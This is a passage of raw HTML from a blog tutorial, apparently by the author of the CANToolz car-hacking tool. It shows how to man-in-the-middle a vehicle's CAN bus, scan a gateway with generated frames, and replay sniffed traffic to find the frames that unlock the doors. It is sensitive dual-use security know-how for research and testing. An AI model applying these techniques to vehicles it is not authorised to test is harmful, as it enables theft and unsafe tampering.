15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> and </span><a href="https://canb.us/" style="text-decoration: none;"><span style="background-color: transparent; color: #888888; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">CANBus Triple</span></a><span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">. In future (and, I hope, with help of contributors) we will add support for another popular hardware.</span></div>
<span id="docs-internal-guid-290a29cd-ba1b-513c-7f8c-79f1053350c4"></span><br />
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Below, I am going to repeat some of the examples of CANToolz usage from my DC#7812 talk and will represent "typical work process on CAN bus testing" and demonstrate how to use this app.</span></div>
</div>
<h4 style="text-align: left;">
Example 1: MitM with blocking</h4>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAVPSaqlHyzS5C-N_-qYxHZGyKNDwSDsMLkOPcv2hIXrktTAoYZll89ogATexcNPYu7bO52Vywc393XM93blpXEp3IFf6NZNrT38bvMnRcXXIznKb8wi6Che_1-U4L0xgJh_gKArK3jmkR/s1600/mitm.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="465" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAVPSaqlHyzS5C-N_-qYxHZGyKNDwSDsMLkOPcv2hIXrktTAoYZll89ogATexcNPYu7bO52Vywc393XM93blpXEp3IFf6NZNrT38bvMnRcXXIznKb8wi6Che_1-U4L0xgJh_gKArK3jmkR/s640/mitm.png" width="640" /></a></div>
<div>
<br /></div>
<br />
<div style="text-align: justify;">
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">When you are "sniffing" CAN traffic, you do not know an exact source and destination of CAN Frame (at the beginning, in general). This is where MiTM can help you to find a direction of the traffic, but just sniffing - not.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Let’s say we are trying to understand which of the CAN frames comes from CAN Gateway to HeadUnit (HU) and which is coming from HU to CAN Gateway. If you will, for instance, "cut" CAN bus in between and connect your hardware than you are going to have TWO interfaces - one from HU and another from CAN gateway. This already will tell you more about frames that you already have (again, we are talking about blackbox analysis).</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">In addition, now we can handle those CAN frames before re-sending (we can use MitM), so we are able to do proxy-fuzzing on the fly, or blocking some CAN frames. Also, we can use blocking, to understand which frames are responsible for what.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Let's take "door-lock" example, from a great book - </span><a href="https://www.nostarch.com/carhacking" style="text-decoration: none;"><span style="background-color: transparent; color: #888888; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">The new Car Hacker's Handbook (2016)</span></a><span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">. Now we can block some frames "on the fly" (by frame arbitration field) and see if the door is unlocked after we did an action from HU control (if this is applicable for your car). Then we can block another frames, etc.</span></div>
<span id="docs-internal-guid-290a29cd-ba1b-df61-32a6-f92c8ec30230"></span><br />
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Then we can see anomalies and different behavior of the car target and its elements that could tell us more about blocked/fuzzed frames! If you want to perform this action in CANToolz, you just create a configuration file (but be careful with your car when you "cut" in between):</span></div>
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgijWvBw4fqo8T3EcMYQy4VepxZbre4SK1CrgDtlUS5_daQZmtGnwRmJqYJOIqHl5DL2SJMX5-jKTOWZnimw-0ohJ11XIs7vjCzHShrFiW621ZMWtFPWD_rZ7hChwB6MeTIJx2OpkR7iOE7/s1600/mitmc.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="376" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgijWvBw4fqo8T3EcMYQy4VepxZbre4SK1CrgDtlUS5_daQZmtGnwRmJqYJOIqHl5DL2SJMX5-jKTOWZnimw-0ohJ11XIs7vjCzHShrFiW621ZMWtFPWD_rZ7hChwB6MeTIJx2OpkR7iOE7/s640/mitmc.png" width="640" /></a></div>
<div>
<br /></div>
<div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">In that part I would like to say few words about config file:</span></div>
<b id="docs-internal-guid-290a29cd-ba1c-b32c-d1ef-04025ff5b3fb" style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">First section is </span><span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">load modules</span><span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> – you have to describe which of the CANToolz modules you need. If you need the same module but in different instance, you can load it twice by adding "~1" or "~2" at the end of the name. A full list of modules you can find in ./modules folder</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Second section is </span><span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">action - </span><span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">describe steps and on each step you tell which of the modules you want to use and what parameters should be on this step. The most important parameter is "</span><span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">pipe</span><span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">" (value 1 by default) and it is all about general design of CANToolz. So each module handle one CAN Frame and each module have INPUT and OUTPUT. The module take input (one CAN Frame) from pipe, do something with it and then PUT it back. For instance, we have two pipes - let me just read this config:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<ul style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: #222222; font-family: Arial; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: -24px; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 3pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">On the step one, READ one CAN frame form FIRST USBtin device and put it into PIPE 1.</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: #222222; font-family: Arial; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: -24px; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 3pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">On the step two, check if current CAN Frame from PIPE 1 in the white list. If not, then block it (remove CAN Frame from PIPE 1)</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: #222222; font-family: Arial; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: -24px; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 3pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">On the step three, READ one CAN frame form SECOND USBtin device and put it into PIPE 2.</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: #222222; font-family: Arial; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: -24px; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 3pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">On the step four, count and save CAN Frame for statistic (in PIPE1)</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: #222222; font-family: arial; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: -24px; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="margin-bottom: 3pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #222222; font-family: "georgia"; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-size: 15.3333px; line-height: 1.2;">On the step five, count and save CAN Frame for statistic (in PIPE2)</span><span style="font-size: 15.3333px; line-height: 18.4px;">
</span></span><span style="font-family: "georgia"; font-size: 15.3333px; line-height: 1.2; white-space: pre-wrap;">// here we have the same module on the both PIPES, so in general we can read steps 4 and 5 like: count and save all CAN Frames from both pipes. (but if CAN Fame was blocked on the step 2, then we will not see those frames)</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: #222222; font-family: Arial; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: -24px; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 3pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">On the step six, write CAN Frame from PIPE 2 via FIRST USBtin device.</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: #222222; font-family: Arial; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: -24px; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 3pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">On the step seven, write CAN Frame from PIPE 1 via Second USBtin device.</span></div>
</li>
</ul>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">It may seem difficult, but, in general, this is able to make your work easier, because you will "assemble" different modules with a logic... and here it is - simple MiTM, where you will block all messages from the FIRST device, except those that have arbitration ID 1337. </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br class="kix-line-break" /></span><span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Once you have config done, run</span><span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: italic; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> cantoolz.py -g w -c mitm_config.py</span><span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br class="kix-line-break" /></span><span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Then you will see the same config but in GUI (http://localhost:4444)</span></div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWm1rkNU6F17tHwGHFkFBRcoY6h4pcEhxL6CLDIaYOYqkn8SDpN7QK1J7_-X6mvbNBi36NaiAnTsLy1FnDKyHClWdoNMP6qHu4zwQkCyg7ttequl4CH1r7HAJQlObexMCj8ezc5jyYqKms/s1600/mitmg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWm1rkNU6F17tHwGHFkFBRcoY6h4pcEhxL6CLDIaYOYqkn8SDpN7QK1J7_-X6mvbNBi36NaiAnTsLy1FnDKyHClWdoNMP6qHu4zwQkCyg7ttequl4CH1r7HAJQlObexMCj8ezc5jyYqKms/s1600/mitmg.png" /></a></div>
<div>
<br /></div>
<div>
<span id="docs-internal-guid-290a29cd-ba1d-374a-bead-f783b5c461ab"></span><br />
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">In </span><span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Actions and steps, </span><span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">we can see pipes (as two columns), and modules, by clicking on the module we can edit parameters and send commands. Output generated to send command to </span><span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">mod_stat</span><span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">.</span></div>
</div>
<div>
<h4>
Example 2: CAN Gateway scanner</h4>
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7V84EqP87GQZOfJEn2gplwVJiYHAPbvr5y-V7RztO14LMlm8r7okmCqkSOYcaJo-_jL4OALn2_q6PDsqAjdlorgOHQrwbxF6KDS7Q4J7EXOkESRyLVRiSTHNxL6roWz02ErlSWuva4jfP/s1600/scan.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="420" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7V84EqP87GQZOfJEn2gplwVJiYHAPbvr5y-V7RztO14LMlm8r7okmCqkSOYcaJo-_jL4OALn2_q6PDsqAjdlorgOHQrwbxF6KDS7Q4J7EXOkESRyLVRiSTHNxL6roWz02ErlSWuva4jfP/s640/scan.png" width="640" /></a></div>
<div>
<br /></div>
<div style="text-align: justify;">
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Another test scenario will be about CAN Gateway. </span></div>
<span id="docs-internal-guid-290a29cd-ba1e-f1d5-9104-5f1e1a7eee44"><span style="color: #222222; font-family: "georgia"; font-size: 15.3333px; vertical-align: baseline; white-space: pre-wrap;">Let's say we want to test our CAN Gateway and find CAN Frames that are passing from OBD2 bus to HeadUnit/IVI. First, we will connect </span><span style="color: #222222; font-family: "georgia"; font-size: 15.3333px; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">CANToolz</span><span style="color: #222222; font-family: "georgia"; font-size: 15.3333px; vertical-align: baseline; white-space: pre-wrap;"> to both buses (OBD2 and IVI) and then send CAN frames from ID 1 to ID 2000 (maximum value is 2047 of Arbitration ID for 11bit, but you can use extended format with 29 bits). After sending, we can check which of the packets we are able to read on another bus and, finally, we can say which of the frames will pass from OBD2 to HU and from HU to OBD2.</span></span><br />
<span style="color: #222222; font-family: "georgia"; font-size: 15.3333px; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div>
Config:</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGsE5d5xElYQdFtk1yZT8qe_gPqOHvdlS5cy2lrt7uddUJmJAk7wsk47vrb3_-c23P9GAoOE6aVwE0s7DmKaHLS3a-lZ7qeQtX_cOSu5H1UxLv3cnZPM9j5F5UG3dqf00jn4VG2NEcQ-BF/s1600/scanc.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="368" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGsE5d5xElYQdFtk1yZT8qe_gPqOHvdlS5cy2lrt7uddUJmJAk7wsk47vrb3_-c23P9GAoOE6aVwE0s7DmKaHLS3a-lZ7qeQtX_cOSu5H1UxLv3cnZPM9j5F5UG3dqf00jn4VG2NEcQ-BF/s640/scanc.png" width="640" /></a></div>
<div>
GUI:</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhBQkBONQVvqZj4b_g18cCu7hmrjtHckVFJzq_nMxRuqbkBdwaBkQLwxbvbkGhULk_g_LaksAx_ZnirnX_SCFZqp-J2SG-AAb5WuGPK5LZZ9mpsAes0-B2ayqLV1NEgGK6s6coC853N2B5/s1600/scang1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhBQkBONQVvqZj4b_g18cCu7hmrjtHckVFJzq_nMxRuqbkBdwaBkQLwxbvbkGhULk_g_LaksAx_ZnirnX_SCFZqp-J2SG-AAb5WuGPK5LZZ9mpsAes0-B2ayqLV1NEgGK6s6coC853N2B5/s1600/scang1.png" /></a></div>
<div>
<br /></div>
<span id="docs-internal-guid-290a29cd-ba1f-f0c6-1ad5-328db89a6245"></span><br />
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span id="docs-internal-guid-290a29cd-ba1f-f0c6-1ad5-328db89a6245"><span style="color: #222222; font-family: "georgia"; font-size: 15.3333px; vertical-align: baseline; white-space: pre-wrap;">Here we just switch to </span><span style="color: #222222; font-family: "georgia"; font-size: 15.3333px; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">gen_ping </span><span style="color: #222222; font-family: "georgia"; font-size: 15.3333px; vertical-align: baseline; white-space: pre-wrap;">and activate this module (by default it was not active). Then this module will generate 2000 frames with different IDs, but with same data field:"\x01\x02\x03\x04\x05\x06\x07\x08". Then USBtin devices (on both pipes) will get some of them that are not blocked by CAN Gateway. </span><span style="color: #222222; font-family: "georgia"; font-size: 15.3333px; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">mod_firewall </span><span style="color: #222222; font-family: "georgia"; font-size: 15.3333px; vertical-align: baseline; white-space: pre-wrap;">clean pipes from all other frames, thus we are interested only in generated and passed CAN gateway. Filtration here done by data field. Finally, just switch to </span><span style="color: #222222; font-family: "georgia"; font-size: 15.3333px; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">mod_stat </span><span style="color: #222222; font-family: "georgia"; font-size: 15.3333px; vertical-align: baseline; white-space: pre-wrap;">and see which of the frames have not been filtered:</span></span></div>
<span id="docs-internal-guid-290a29cd-ba1f-f0c6-1ad5-328db89a6245">
</span>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8xshxmi3XaYhGjL_mC_6kwYvXcZG_JYxg02hibWIeLEO4eYYtAhVwbjJ_O5aBYCq5LIQJ6VL_M5pniKyn747g2aohJuvvFZFOuoatd2pb1TvVpPAQ2IT5Y_w88tfu2o_aBFgmPtqIQWpy/s1600/scang2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8xshxmi3XaYhGjL_mC_6kwYvXcZG_JYxg02hibWIeLEO4eYYtAhVwbjJ_O5aBYCq5LIQJ6VL_M5pniKyn747g2aohJuvvFZFOuoatd2pb1TvVpPAQ2IT5Y_w88tfu2o_aBFgmPtqIQWpy/s1600/scang2.png" /></a></div>
<div>
<br /></div>
<div>
<h4>
Example 3: Replay traffic</h4>
</div>
<div style="text-align: justify;">
<span id="docs-internal-guid-290a29cd-ba20-6d46-3976-e4daa20b4b0c"></span><br />
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span id="docs-internal-guid-290a29cd-ba20-6d46-3976-e4daa20b4b0c"><span style="color: #222222; font-family: "georgia"; font-size: 15.3333px; vertical-align: baseline; white-space: pre-wrap;">This example is taken from </span><span style="color: #222222; font-family: "georgia"; font-size: 15.3333px; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">Car Hacker's Handbook. </span><span style="color: #222222; font-family: "georgia"; font-size: 15.3333px; vertical-align: baseline; white-space: pre-wrap;">Here you will find answers on</span><span style="color: #222222; font-family: "georgia"; font-size: 15.3333px; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #222222; font-family: "georgia"; font-size: 15.3333px; vertical-align: baseline; white-space: pre-wrap;">how to find CAN frames that are used for door-unlock. This is going to be simple: sniff traffic when you doing unlock, then replay this traffic. Remember that inside the traffic there are a lot of other frames. If all is Ok, replay half of this traffic, if event happen, then our frames in that half, if not then in another. Continue this "binary search" until you find needed frames. </span></span></div>
<span id="docs-internal-guid-290a29cd-ba20-6d46-3976-e4daa20b4b0c">
</span> Let's repeat this test scenario in <b>CANToolz</b>:</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifWUbsqjWZ8rdzskyGrA0Yf-ilzlRJYRWYCF0GFGk9uT-YNuZz5HJ5DG6l-b1e6qpzSL6gAjH87pvuPTaaN-CnPcCwZvbRc_6G8Z1L7E28sJ9bIABBgNEhvhMS5gWDf8Ltz5ysxQ2y0HuV/s1600/replayc.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifWUbsqjWZ8rdzskyGrA0Yf-ilzlRJYRWYCF0GFGk9uT-YNuZz5HJ5DG6l-b1e6qpzSL6gAjH87pvuPTaaN-CnPcCwZvbRc_6G8Z1L7E28sJ9bIABBgNEhvhMS5gWDf8Ltz5ysxQ2y0HuV/s640/replayc.png" width="640" /></a></div>
<span id="docs-internal-guid-290a29cd-ba20-ecbc-2071-ce5655e03028"><span style="color: #222222; font-family: "georgia"; font-size: 15.3333px; vertical-align: baseline; white-space: pre-wrap;">Run CANToolz, and enable sniff mode, afterwards perform the "unlock action".</span></span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCvVgCt9Z0Oq_tjAHdOtqsIObK1tCBZtABisxs7vZnFBQ9XRhbG4nAsFQXqk5P4Rlo1pM6356-UJ-Djpoe0Y4Y-w3nMoW2sRdrJDPLPy9u42dRirhYHwjIY-Ur71WBILDYb4hT0xZuiChc/s1600/replayg1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCvVgCt9Z0Oq_tjAHdOtqsIObK1tCBZtABisxs7vZnFBQ9XRhbG4nAsFQXqk5P4Rlo1pM6356-UJ-Djpoe0Y4Y-w3nMoW2sRdrJDPLPy9u42dRirhYHwjIY-Ur71WBILDYb4hT0xZuiChc/s1600/replayg1.png" /></a></div>
<br />
<br />
<span id="docs-internal-guid-290a29cd-ba21-7012-77be-cbf2cdccae4b"></span><br />
<div dir="ltr" style="line-height: 1.2; margin-bottom: 12pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">After all, stop sniffing mode and see the amount of gathered frames. If you want to replay those frames, you have to switch module </span><span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">gen_replay</span><span style="background-color: transparent; color: #222222; font-family: "georgia"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> to second PIPE...</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh56FMZa8gY715KgAHXGKAzYuNepeawRQ2rRFQUUxyl0STJXgrRwWFj9ap5yaR5ykY6H63ONiO8af2H0mZFJ7NTd5m3lFjp_MprQCmLXTwZbRbigH-FGU-aLr3L5mjLIO2Iz-naQDBwL91p/s1600/replayg12.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh56FMZa8gY715KgAHXGKAzYuNepeawRQ2rRFQUUxyl0STJXgrRwWFj9ap5yaR5ykY6H63ONiO8af2H0mZFJ7NTd5m3lFjp_MprQCmLXTwZbRbigH-FGU-aLr3L5mjLIO2Iz-naQDBwL91p/s1600/replayg12.png" /></a></div>
<br />
<br />
Then let's start binary search through replaying!<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
